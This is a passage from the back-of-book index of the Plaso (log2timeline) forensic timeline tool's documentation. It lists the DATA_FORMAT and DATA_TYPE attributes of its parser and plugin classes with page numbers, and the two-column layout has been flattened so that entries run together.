(plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmbPlugin cs_username (plaso.parsers.iis.IISEventData attribute), attribute), 214 379

528 Index Plaso (log2timeline), Release 20210606

DATA_FORMAT (plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmtPluginDATA_FORMAT (plaso.parsers.mac_wifi.MacWifiLogParser attribute), 215 attribute), 391 DATA_FORMAT (plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmzPluginDATA_FORMAT (plaso.parsers.mactime.MactimeParser at- attribute), 215 tribute), 393 DATA_FORMAT (plaso.parsers.cookie_plugins.interface.BaseCookiePluginDATA_FORMAT (plaso.parsers.mcafeeav.McafeeAccessProtectionParser attribute), 215 attribute), 396 DATA_FORMAT (plaso.parsers.cups_ipp.CupsIppParser DATA_FORMAT (plaso.parsers.msiecf.MSIECFParser at- attribute), 366 tribute), 401 DATA_FORMAT (plaso.parsers.custom_destinations.CustomDestinationsParserDATA_FORMAT (plaso.parsers.networkminer.NetworkMinerParser attribute), 366 attribute), 404 DATA_FORMAT (plaso.parsers.czip.CompoundZIPParser DATA_FORMAT (plaso.parsers.ntfs.NTFSMFTParser at- attribute), 367 tribute), 405 DATA_FORMAT (plaso.parsers.czip_plugins.interface.CompoundZIPPluginDATA_FORMAT (plaso.parsers.ntfs.NTFSUsnJrnlParser attribute), 217 attribute), 406 DATA_FORMAT (plaso.parsers.czip_plugins.oxml.OpenXMLPluginDATA_FORMAT (plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsOLECFPlugin attribute), 219 attribute), 229 DATA_FORMAT (plaso.parsers.docker.DockerJSONParser DATA_FORMAT (plaso.parsers.olecf_plugins.default.DefaultOLECFPlugin attribute), 368 attribute), 230 DATA_FORMAT (plaso.parsers.dpkg.DpkgParser at- DATA_FORMAT (plaso.parsers.olecf_plugins.interface.OLECFPlugin tribute), 369 attribute), 230 DATA_FORMAT (plaso.parsers.esedb.ESEDBParser DATA_FORMAT (plaso.parsers.olecf_plugins.summary.DocumentSummaryInformationOLECFPlugin attribute), 371 attribute), 231 DATA_FORMAT (plaso.parsers.esedb_plugins.file_history.FileHistoryESEDBPluginDATA_FORMAT (plaso.parsers.olecf_plugins.summary.SummaryInformationOLECFPlugin attribute), 219 attribute), 231 DATA_FORMAT (plaso.parsers.esedb_plugins.interface.ESEDBPluginDATA_FORMAT 
(plaso.parsers.opera.OperaGlobalHistoryParser attribute), 220 attribute), 408 DATA_FORMAT (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheESEDBPluginDATA_FORMAT (plaso.parsers.opera.OperaTypedHistoryParser attribute), 223 attribute), 408 DATA_FORMAT (plaso.parsers.esedb_plugins.srum.SystemResourceUsageMonitorESEDBPluginDATA_FORMAT (plaso.parsers.pe.PEParser attribute), 409 attribute), 227 DATA_FORMAT (plaso.parsers.plist.PlistParser attribute), DATA_FORMAT (plaso.parsers.filestat.FileStatParser at- 410 tribute), 373 DATA_FORMAT (plaso.parsers.plist_plugins.airport.AirportPlugin DATA_FORMAT (plaso.parsers.firefox_cache.FirefoxCache2Parser attribute), 232 attribute), 373 DATA_FORMAT (plaso.parsers.plist_plugins.appleaccount.AppleAccountPlugin DATA_FORMAT (plaso.parsers.firefox_cache.FirefoxCacheParser attribute), 232 attribute), 374 DATA_FORMAT (plaso.parsers.plist_plugins.bluetooth.BluetoothPlugin DATA_FORMAT (plaso.parsers.fseventsd.FseventsdParser attribute), 233 attribute), 375 DATA_FORMAT (plaso.parsers.plist_plugins.default.DefaultPlugin DATA_FORMAT (plaso.parsers.gdrive_synclog.GoogleDriveSyncLogParserattribute), 233 attribute), 376 DATA_FORMAT (plaso.parsers.plist_plugins.install_history.InstallHistoryPlugin DATA_FORMAT (plaso.parsers.google_logging.GoogleLogParser attribute), 233 attribute), 377 DATA_FORMAT (plaso.parsers.plist_plugins.ipod.IPodPlugin DATA_FORMAT (plaso.parsers.iis.WinIISParser attribute), attribute), 235 380 DATA_FORMAT (plaso.parsers.plist_plugins.launchd.LaunchdPlugin DATA_FORMAT (plaso.parsers.interface.BaseParser attribute), 236 attribute), 382 DATA_FORMAT (plaso.parsers.plist_plugins.macuser.MacUserPlugin DATA_FORMAT (plaso.parsers.java_idx.JavaIDXParser at- attribute), 236 tribute), 384 DATA_FORMAT (plaso.parsers.plist_plugins.safari.SafariHistoryPlugin DATA_FORMAT (plaso.parsers.mac_appfirewall.MacAppFirewallParserattribute), 237 attribute), 385 DATA_FORMAT (plaso.parsers.plist_plugins.softwareupdate.SoftwareUpdatePlugin 
DATA_FORMAT (plaso.parsers.mac_keychain.KeychainParser attribute), 237 attribute), 388 DATA_FORMAT (plaso.parsers.plist_plugins.spotlight.SpotlightPlugin DATA_FORMAT (plaso.parsers.mac_securityd.MacOSSecuritydLogParserattribute), 238 attribute), 389 DATA_FORMAT (plaso.parsers.plist_plugins.spotlight_volume.SpotlightVolumePlugin

Index 529 Plaso (log2timeline), Release 20210606

attribute), 238 attribute), 259 DATA_FORMAT (plaso.parsers.plist_plugins.timemachine.TimeMachinePluginDATA_FORMAT (plaso.parsers.sqlite_plugins.firefox_downloads.FirefoxDownloadsPlugin attribute), 238 attribute), 261 DATA_FORMAT (plaso.parsers.plugins.BasePlugin at- DATA_FORMAT (plaso.parsers.sqlite_plugins.firefox_history.FirefoxHistoryPlugin tribute), 411 attribute), 262 DATA_FORMAT (plaso.parsers.popcontest.PopularityContestParserDATA_FORMAT (plaso.parsers.sqlite_plugins.gdrive.GoogleDrivePlugin attribute), 414 attribute), 267 DATA_FORMAT (plaso.parsers.recycler.WinRecycleBinParserDATA_FORMAT (plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessagePlugin attribute), 417 attribute), 271 DATA_FORMAT (plaso.parsers.recycler.WinRecyclerInfo2ParserDATA_FORMAT (plaso.parsers.sqlite_plugins.imessage.IMessagePlugin attribute), 417 attribute), 273 DATA_FORMAT (plaso.parsers.safari_cookies.BinaryCookieParserDATA_FORMAT (plaso.parsers.sqlite_plugins.interface.SQLitePlugin attribute), 418 attribute), 276 DATA_FORMAT (plaso.parsers.santa.SantaParser at- DATA_FORMAT (plaso.parsers.sqlite_plugins.kik_ios.KikIOSPlugin tribute), 422 attribute), 277 DATA_FORMAT (plaso.parsers.sccm.SCCMParser at- DATA_FORMAT (plaso.parsers.sqlite_plugins.kodi.KodiMyVideosPlugin tribute), 424 attribute), 278 DATA_FORMAT (plaso.parsers.selinux.SELinuxParser at- DATA_FORMAT (plaso.parsers.sqlite_plugins.ls_quarantine.LsQuarantinePlugin tribute), 426 attribute), 281 DATA_FORMAT (plaso.parsers.setupapi.SetupapiLogParser DATA_FORMAT (plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsPlugin attribute), 427 attribute), 283 DATA_FORMAT (plaso.parsers.skydrivelog.SkyDriveLogParserDATA_FORMAT (plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCPlugin attribute), 429 attribute), 284 DATA_FORMAT (plaso.parsers.skydrivelog.SkyDriveOldLogParserDATA_FORMAT (plaso.parsers.sqlite_plugins.mac_notes.MacNotesPlugin attribute), 430 attribute), 286 DATA_FORMAT 
(plaso.parsers.sophos_av.SophosAVLogParserDATA_FORMAT (plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterPlugin attribute), 431 attribute), 288 DATA_FORMAT (plaso.parsers.spotlight_storedb.SpotlightStoreDatabaseParserDATA_FORMAT (plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCachePlugin attribute), 432 attribute), 290 DATA_FORMAT (plaso.parsers.sqlite.SQLiteParser at- DATA_FORMAT (plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCPlugin tribute), 435 attribute), 291 DATA_FORMAT (plaso.parsers.sqlite_plugins.android_calls.AndroidCallPluginDATA_FORMAT (plaso.parsers.sqlite_plugins.safari.SafariHistoryPluginSqlite attribute), 240 attribute), 293 DATA_FORMAT (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSPluginDATA_FORMAT (plaso.parsers.sqlite_plugins.skype.SkypePlugin attribute), 243 attribute), 296 DATA_FORMAT (plaso.parsers.sqlite_plugins.android_webview.WebViewPluginDATA_FORMAT (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidProfilePlugin attribute), 245 attribute), 301 DATA_FORMAT (plaso.parsers.sqlite_plugins.android_webviewcache.AndroidWebViewCachePluginDATA_FORMAT (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidTCPlugin attribute), 246 attribute), 302 DATA_FORMAT (plaso.parsers.sqlite_plugins.appusage.ApplicationUsagePluginDATA_FORMAT (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidPlugin attribute), 247 attribute), 304 DATA_FORMAT (plaso.parsers.sqlite_plugins.chrome_autofill.ChromeAutofillPluginDATA_FORMAT (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSPlugin attribute), 249 attribute), 309 DATA_FORMAT (plaso.parsers.sqlite_plugins.chrome_cookies.Chrome17CookiePluginDATA_FORMAT (plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelinePlugin attribute), 249 attribute), 312 DATA_FORMAT (plaso.parsers.sqlite_plugins.chrome_cookies.Chrome66CookiePluginDATA_FORMAT (plaso.parsers.sqlite_plugins.zeitgeist.ZeitgeistActivityDatabasePlugin attribute), 250 attribute), 314 DATA_FORMAT 
(plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityPluginDATA_FORMAT (plaso.parsers.symantec.SymantecParser attribute), 252 attribute), 441 DATA_FORMAT (plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome27HistoryPluginDATA_FORMAT (plaso.parsers.syslog.SyslogParser at- attribute), 255 tribute), 442 DATA_FORMAT (plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome8HistoryPluginDATA_FORMAT (plaso.parsers.syslog_plugins.cron.CronSyslogPlugin attribute), 257 attribute), 316 DATA_FORMAT (plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookiePluginDATA_FORMAT (plaso.parsers.syslog_plugins.interface.SyslogPlugin

530 Index Plaso (log2timeline), Release 20210606

attribute), 316 attribute), 331 DATA_FORMAT (plaso.parsers.syslog_plugins.ssh.SSHSyslogPluginDATA_FORMAT (plaso.parsers.winreg_plugins.mrulistex.MRUListExStringAndShellItemListWindowsRegistryPlugin attribute), 318 attribute), 332 DATA_FORMAT (plaso.parsers.systemd_journal.SystemdJournalParserDATA_FORMAT (plaso.parsers.winreg_plugins.mrulistex.MRUListExStringAndShellItemWindowsRegistryPlugin attribute), 444 attribute), 332 DATA_FORMAT (plaso.parsers.trendmicroav.OfficeScanVirusDetectionParserDATA_FORMAT (plaso.parsers.winreg_plugins.mrulistex.MRUListExStringWindowsRegistryPlugin attribute), 448 attribute), 332 DATA_FORMAT (plaso.parsers.trendmicroav.OfficeScanWebReputationParserDATA_FORMAT (plaso.parsers.winreg_plugins.msie_zones.MSIEZoneSettingsPlugin attribute), 449 attribute), 333 DATA_FORMAT (plaso.parsers.utmp.UtmpParser at- DATA_FORMAT (plaso.parsers.winreg_plugins.network_drives.NetworkDrivesPlugin tribute), 452 attribute), 334 DATA_FORMAT (plaso.parsers.utmpx.UtmpxParser at- DATA_FORMAT (plaso.parsers.winreg_plugins.networks.NetworksWindowsRegistryPlugin tribute), 453 attribute), 335 DATA_FORMAT (plaso.parsers.vsftpd.VsftpdLogParser at- DATA_FORMAT (plaso.parsers.winreg_plugins.officemru.OfficeMRUPlugin tribute), 454 attribute), 336 DATA_FORMAT (plaso.parsers.winevt.WinEvtParser DATA_FORMAT (plaso.parsers.winreg_plugins.outlook.OutlookSearchMRUPlugin attribute), 455 attribute), 337 DATA_FORMAT (plaso.parsers.winevtx.WinEvtxParser at- DATA_FORMAT (plaso.parsers.winreg_plugins.programscache.ExplorerProgramsCacheWindowsRegistryPlugin tribute), 456 attribute), 338 DATA_FORMAT (plaso.parsers.winfirewall.WinFirewallParserDATA_FORMAT (plaso.parsers.winreg_plugins.run.AutoRunsPlugin attribute), 459 attribute), 338 DATA_FORMAT (plaso.parsers.winjob.WinJobParser at- DATA_FORMAT (plaso.parsers.winreg_plugins.sam_users.SAMUsersWindowsRegistryPlugin tribute), 460 attribute), 340 DATA_FORMAT (plaso.parsers.winlnk.WinLnkParser at- DATA_FORMAT 
(plaso.parsers.winreg_plugins.services.ServicesPlugin tribute), 462 attribute), 340 DATA_FORMAT (plaso.parsers.winprefetch.WinPrefetchParserDATA_FORMAT (plaso.parsers.winreg_plugins.shutdown.ShutdownWindowsRegistryPlugin attribute), 463 attribute), 342 DATA_FORMAT (plaso.parsers.winreg_parser.WinRegistryParserDATA_FORMAT (plaso.parsers.winreg_plugins.task_scheduler.TaskCacheWindowsRegistryPlugin attribute), 464 attribute), 342 DATA_FORMAT (plaso.parsers.winreg_plugins.amcache.AMCachePluginDATA_FORMAT (plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientMRUPlugin attribute), 319 attribute), 343 DATA_FORMAT (plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheWindowsRegistryPluginDATA_FORMAT (plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientPlugin attribute), 321 attribute), 344 DATA_FORMAT (plaso.parsers.winreg_plugins.bagmru.BagMRUWindowsRegistryPluginDATA_FORMAT (plaso.parsers.winreg_plugins.timezone.WinRegTimezonePlugin attribute), 322 attribute), 344 DATA_FORMAT (plaso.parsers.winreg_plugins.bam.BackgroundActivityModeratorWindowsRegistryPluginDATA_FORMAT (plaso.parsers.winreg_plugins.typedurls.TypedURLsPlugin attribute), 323 attribute), 345 DATA_FORMAT (plaso.parsers.winreg_plugins.ccleaner.CCleanerPluginDATA_FORMAT (plaso.parsers.winreg_plugins.usb.USBPlugin attribute), 324 attribute), 346 DATA_FORMAT (plaso.parsers.winreg_plugins.default.DefaultPluginDATA_FORMAT (plaso.parsers.winreg_plugins.usbstor.USBStorPlugin attribute), 325 attribute), 347 DATA_FORMAT (plaso.parsers.winreg_plugins.interface.WindowsRegistryPluginDATA_FORMAT (plaso.parsers.winreg_plugins.userassist.UserAssistPlugin attribute), 326 attribute), 348 DATA_FORMAT (plaso.parsers.winreg_plugins.lfu.BootExecutePluginDATA_FORMAT (plaso.parsers.winreg_plugins.windows_version.WindowsVersionPlugin attribute), 327 attribute), 350 DATA_FORMAT (plaso.parsers.winreg_plugins.lfu.BootVerificationPluginDATA_FORMAT (plaso.parsers.winreg_plugins.winlogon.WinlogonPlugin 
attribute), 327 attribute), 351 DATA_FORMAT (plaso.parsers.winreg_plugins.mountpoints.MountPoints2PluginDATA_FORMAT (plaso.parsers.winreg_plugins.winrar.WinRARHistoryPlugin attribute), 329 attribute), 351 DATA_FORMAT (plaso.parsers.winreg_plugins.mrulist.MRUListShellItemListWindowsRegistryPluginDATA_FORMAT (plaso.parsers.winrestore.RestorePointLogParser attribute), 330 attribute), 465 DATA_FORMAT (plaso.parsers.winreg_plugins.mrulist.MRUListStringWindowsRegistryPluginDATA_FORMAT (plaso.parsers.xchatlog.XChatLogParser attribute), 330 attribute), 466 DATA_FORMAT (plaso.parsers.winreg_plugins.mrulistex.MRUListExShellItemListWindowsRegistryPluginDATA_FORMAT (plaso.parsers.xchatscrollback.XChatScrollbackParser

Index 531 Plaso (log2timeline), Release 20210606

attribute), 467 DATA_TYPE (plaso.parsers.bencode_plugins.transmission.TransmissionEventData DATA_FORMAT (plaso.parsers.zsh_extended_history.ZshExtendedHistoryParserattribute), 212 attribute), 468 DATA_TYPE (plaso.parsers.bencode_plugins.utorrent.UTorrentEventData DATA_FORMATE (plaso.parsers.pls_recall.PlsRecallParser attribute), 213 attribute), 411 DATA_TYPE (plaso.parsers.bsm.BSMEventData at- data_location (plaso.analysis.mediator.AnalysisMediator tribute), 360 property), 46 DATA_TYPE (plaso.parsers.chrome_cache.ChromeCacheEntryEventData data_location (plaso.cli.tools.CLITool property), 94 attribute), 362 data_location (plaso.engine.configurations.ProcessingConfigurationDATA_TYPE (plaso.parsers.chrome_preferences.ChromeContentSettingsExceptionsEventData attribute), 124 attribute), 364 data_location (plaso.output.mediator.OutputMediator DATA_TYPE (plaso.parsers.chrome_preferences.ChromeExtensionInstallationEventData attribute), 203 attribute), 364 data_size (plaso.parsers.firefox_cache.FirefoxCacheEventDataDATA_TYPE (plaso.parsers.chrome_preferences.ChromeExtensionsAutoupdaterEventData attribute), 373 attribute), 364 data_size (plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItemDATA_TYPE (plaso.parsers.chrome_preferences.ChromePreferencesClearHistoryEventData attribute), 433 attribute), 364 data_stream (plaso.containers.artifacts.PathArtifact at- DATA_TYPE (plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsEventData tribute), 99 attribute), 214 DATA_TYPE (plaso.containers.event_sources.EventSource DATA_TYPE (plaso.parsers.cups_ipp.CupsIppEventData attribute), 104 attribute), 366 data_type (plaso.containers.event_sources.EventSource DATA_TYPE (plaso.parsers.czip_plugins.oxml.OpenXMLEventData attribute), 104 attribute), 219 DATA_TYPE (plaso.containers.event_sources.FileEntryEventSourceDATA_TYPE (plaso.parsers.docker.DockerJSONContainerEventData attribute), 104 attribute), 367 data_type (plaso.containers.events.EventData at- DATA_TYPE 
(plaso.parsers.docker.DockerJSONContainerLogEventData tribute), 104 attribute), 368 DATA_TYPE (plaso.containers.plist_event.PlistTimeEventDataDATA_TYPE (plaso.parsers.docker.DockerJSONLayerEventData attribute), 110 attribute), 368 DATA_TYPE (plaso.containers.shell_item_events.ShellItemFileEntryEventDataDATA_TYPE (plaso.parsers.dpkg.DpkgEventData at- attribute), 116 tribute), 369 DATA_TYPE (plaso.containers.windows_events.WindowsDistributedLinkTrackingEventDataDATA_TYPE (plaso.parsers.esedb_plugins.file_history.FileHistoryNamespaceEventData attribute), 122 attribute), 220 DATA_TYPE (plaso.containers.windows_events.WindowsRegistryEventDataDATA_TYPE (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventData attribute), 122 attribute), 222 DATA_TYPE (plaso.containers.windows_events.WindowsVolumeEventDataDATA_TYPE (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainersEventData attribute), 122 attribute), 222 DATA_TYPE (plaso.formatters.default.DefaultEventFormatterDATA_TYPE (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheLeakFilesEventData attribute), 168 attribute), 224 DATA_TYPE (plaso.formatters.interface.CustomEventFormatterHelperDATA_TYPE (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCachePartitionsEventData attribute), 171 attribute), 224 data_type (plaso.formatters.interface.EventFormatter DATA_TYPE (plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventData property), 172 attribute), 226 DATA_TYPE (plaso.parsers.android_app_usage.AndroidAppUsageEventDataDATA_TYPE (plaso.parsers.esedb_plugins.srum.SRUMNetworkConnectivityUsageEventData attribute), 352 attribute), 226 DATA_TYPE (plaso.parsers.apache_access.ApacheAccessEventDataDATA_TYPE (plaso.parsers.esedb_plugins.srum.SRUMNetworkDataUsageEventData attribute), 353 attribute), 227 DATA_TYPE (plaso.parsers.apt_history.APTHistoryLogEventDataDATA_TYPE (plaso.parsers.filestat.FileStatEventData at- attribute), 355 tribute), 373 DATA_TYPE (plaso.parsers.asl.ASLEventData 
attribute), DATA_TYPE (plaso.parsers.firefox_cache.FirefoxCacheEventData 357 attribute), 374 DATA_TYPE (plaso.parsers.asl.ASLFileEventData at- DATA_TYPE (plaso.parsers.fseventsd.FseventsdEventData tribute), 357 attribute), 375 DATA_TYPE (plaso.parsers.bash_history.BashHistoryEventDataDATA_TYPE (plaso.parsers.gdrive_synclog.GoogleDriveSyncLogEventData attribute), 358 attribute), 376

532 Index Plaso (log2timeline), Release 20210606

DATA_TYPE (plaso.parsers.google_logging.GoogleLogEventDataDATA_TYPE (plaso.parsers.safari_cookies.SafariBinaryCookieEventData attribute), 377 attribute), 419 DATA_TYPE (plaso.parsers.iis.IISEventData attribute), DATA_TYPE (plaso.parsers.santa.SantaExecutionEventData 380 attribute), 420 DATA_TYPE (plaso.parsers.java_idx.JavaIDXEventData DATA_TYPE (plaso.parsers.santa.SantaFileSystemEventData attribute), 384 attribute), 421 DATA_TYPE (plaso.parsers.mac_appfirewall.MacAppFirewallLogEventDataDATA_TYPE (plaso.parsers.santa.SantaMountEventData attribute), 385 attribute), 422 DATA_TYPE (plaso.parsers.mac_keychain.KeychainApplicationRecordEventDataDATA_TYPE (plaso.parsers.sccm.SCCMLogEventData at- attribute), 387 tribute), 424 DATA_TYPE (plaso.parsers.mac_keychain.KeychainInternetRecordEventDataDATA_TYPE (plaso.parsers.selinux.SELinuxLogEventData attribute), 388 attribute), 426 DATA_TYPE (plaso.parsers.mac_securityd.MacOSSecuritydLogEventDataDATA_TYPE (plaso.parsers.setupapi.SetupapiLogEventData attribute), 389 attribute), 427 DATA_TYPE (plaso.parsers.mac_wifi.MacWifiLogEventDataDATA_TYPE (plaso.parsers.skydrivelog.SkyDriveLogEventData attribute), 391 attribute), 429 DATA_TYPE (plaso.parsers.mactime.MactimeEventData DATA_TYPE (plaso.parsers.skydrivelog.SkyDriveOldLogEventData attribute), 393 attribute), 430 DATA_TYPE (plaso.parsers.mcafeeav.McafeeAVEventData DATA_TYPE (plaso.parsers.sophos_av.SophosAVLogEventData attribute), 396 attribute), 431 DATA_TYPE (plaso.parsers.msiecf.MSIECFLeakEventData DATA_TYPE (plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItemEventData attribute), 401 attribute), 434 DATA_TYPE (plaso.parsers.msiecf.MSIECFRedirectedEventDataDATA_TYPE (plaso.parsers.sqlite_plugins.android_calls.AndroidCallEventData attribute), 402 attribute), 240 DATA_TYPE (plaso.parsers.msiecf.MSIECFURLEventData DATA_TYPE (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSEventData attribute), 403 attribute), 243 DATA_TYPE 
(plaso.parsers.networkminer.NetworkMinerEventDataDATA_TYPE (plaso.parsers.sqlite_plugins.android_webview.WebViewCookieEventData attribute), 403 attribute), 245 DATA_TYPE (plaso.parsers.ntfs.NTFSFileStatEventData DATA_TYPE (plaso.parsers.sqlite_plugins.android_webviewcache.AndroidWebViewCacheEventData attribute), 405 attribute), 246 DATA_TYPE (plaso.parsers.ntfs.NTFSUSNChangeEventDataDATA_TYPE (plaso.parsers.sqlite_plugins.appusage.MacOSApplicationUsageEventData attribute), 406 attribute), 248 DATA_TYPE (plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsDestListEntryEventDataDATA_TYPE (plaso.parsers.sqlite_plugins.chrome_autofill.ChromeAutofillEventData attribute), 229 attribute), 248 DATA_TYPE (plaso.parsers.olecf_plugins.default.OLECFItemEventDataDATA_TYPE (plaso.parsers.sqlite_plugins.chrome_cookies.ChromeCookieEventData attribute), 230 attribute), 251 DATA_TYPE (plaso.parsers.opera.OperaGlobalHistoryEventDataDATA_TYPE (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventData attribute), 407 attribute), 252 DATA_TYPE (plaso.parsers.opera.OperaTypedHistoryEventDataDATA_TYPE (plaso.parsers.sqlite_plugins.chrome_history.ChromeHistoryFileDownloadedEventData attribute), 408 attribute), 254 DATA_TYPE (plaso.parsers.pe.PEEventData attribute), DATA_TYPE (plaso.parsers.sqlite_plugins.chrome_history.ChromeHistoryPageVisitedEventData 409 attribute), 255 DATA_TYPE (plaso.parsers.plist_plugins.ipod.IPodPlistEventDataDATA_TYPE (plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookieEventData attribute), 235 attribute), 259 DATA_TYPE (plaso.parsers.plist_plugins.safari.SafariHistoryEventDataDATA_TYPE (plaso.parsers.sqlite_plugins.firefox_downloads.FirefoxDownloadEventData attribute), 237 attribute), 261 DATA_TYPE (plaso.parsers.pls_recall.PlsRecallEventData DATA_TYPE (plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkAnnotationEventData attribute), 410 attribute), 265 DATA_TYPE 
(plaso.parsers.popcontest.PopularityContestEventDataDATA_TYPE (plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkEventData attribute), 414 attribute), 266 DATA_TYPE (plaso.parsers.popcontest.PopularityContestSessionEventDataDATA_TYPE (plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkFolderEventData attribute), 415 attribute), 266 DATA_TYPE (plaso.parsers.recycler.WinRecycleBinEventDataDATA_TYPE (plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesPageVisitedEventData attribute), 417 attribute), 267

DATA_TYPE (plaso.parsers.sqlite_plugins.gdrive.GoogleDriveSnapshotCloudEntryEventDataDATA_TYPE (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSStatusEventData attribute), 269 attribute), 311 DATA_TYPE (plaso.parsers.sqlite_plugins.gdrive.GoogleDriveSnapshotLocalEntryEventDataDATA_TYPE (plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineGenericEventData attribute), 270 attribute), 311 DATA_TYPE (plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessageDataDATA_TYPE (plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineUserEngagedEventData attribute), 270 attribute), 314 DATA_TYPE (plaso.parsers.sqlite_plugins.imessage.IMessageEventDataDATA_TYPE (plaso.parsers.sqlite_plugins.zeitgeist.ZeitgeistActivityEventData attribute), 273 attribute), 315 DATA_TYPE (plaso.parsers.sqlite_plugins.kik_ios.KikIOSMessageEventDataDATA_TYPE (plaso.parsers.symantec.SymantecEventData attribute), 277 attribute), 440 DATA_TYPE (plaso.parsers.sqlite_plugins.kodi.KodiVideoEventDataDATA_TYPE (plaso.parsers.syslog.SyslogCommentEventData attribute), 281 attribute), 441 DATA_TYPE (plaso.parsers.sqlite_plugins.ls_quarantine.LsQuarantineEventDataDATA_TYPE (plaso.parsers.syslog.SyslogLineEventData attribute), 281 attribute), 442 DATA_TYPE (plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsEventDataDATA_TYPE (plaso.parsers.syslog_plugins.cron.CronTaskRunEventData attribute), 283 attribute), 316 DATA_TYPE (plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCApplicationEventDataDATA_TYPE (plaso.parsers.syslog_plugins.ssh.SSHFailedConnectionEventData attribute), 284 attribute), 317 DATA_TYPE (plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCSafariEventDataDATA_TYPE (plaso.parsers.syslog_plugins.ssh.SSHLoginEventData attribute), 286 attribute), 318 DATA_TYPE (plaso.parsers.sqlite_plugins.mac_notes.MacNotesEventDataDATA_TYPE (plaso.parsers.syslog_plugins.ssh.SSHOpenedConnectionEventData attribute), 286 attribute), 318 DATA_TYPE 
(plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterEventDataDATA_TYPE (plaso.parsers.systemd_journal.SystemdJournalEventData attribute), 288 attribute), 444 DATA_TYPE (plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCacheEventDataDATA_TYPE (plaso.parsers.trendmicroav.TrendMicroAVEventData attribute), 290 attribute), 450 DATA_TYPE (plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCEntryDATA_TYPE (plaso.parsers.trendmicroav.TrendMicroUrlEventData attribute), 291 attribute), 451 DATA_TYPE (plaso.parsers.sqlite_plugins.safari.SafariHistoryPageVisitedEventDataDATA_TYPE (plaso.parsers.utmp.UtmpEventData at- attribute), 293 tribute), 452 DATA_TYPE (plaso.parsers.sqlite_plugins.skype.SkypeAccountEventDataDATA_TYPE (plaso.parsers.utmpx.UtmpxMacOSEventData attribute), 295 attribute), 453 DATA_TYPE (plaso.parsers.sqlite_plugins.skype.SkypeCallEventDataDATA_TYPE (plaso.parsers.vsftpd.VsftpdEventData attribute), 295 attribute), 454 DATA_TYPE (plaso.parsers.sqlite_plugins.skype.SkypeChatEventDataDATA_TYPE (plaso.parsers.winevt.WinEvtRecordEventData attribute), 296 attribute), 456 DATA_TYPE (plaso.parsers.sqlite_plugins.skype.SkypeSMSEventDataDATA_TYPE (plaso.parsers.winevtx.WinEvtxRecordEventData attribute), 299 attribute), 457 DATA_TYPE (plaso.parsers.sqlite_plugins.skype.SkypeTransferFileEventDataDATA_TYPE (plaso.parsers.winfirewall.WinFirewallEventData attribute), 299 attribute), 459 DATA_TYPE (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidContactEventDataDATA_TYPE (plaso.parsers.winjob.WinJobEventData at- attribute), 300 tribute), 460 DATA_TYPE (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidConversationEventDataDATA_TYPE (plaso.parsers.winlnk.WinLnkLinkEventData attribute), 301 attribute), 462 DATA_TYPE (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidMessageEventDataDATA_TYPE (plaso.parsers.winprefetch.WinPrefetchExecutionEventData attribute), 301 attribute), 463 DATA_TYPE 
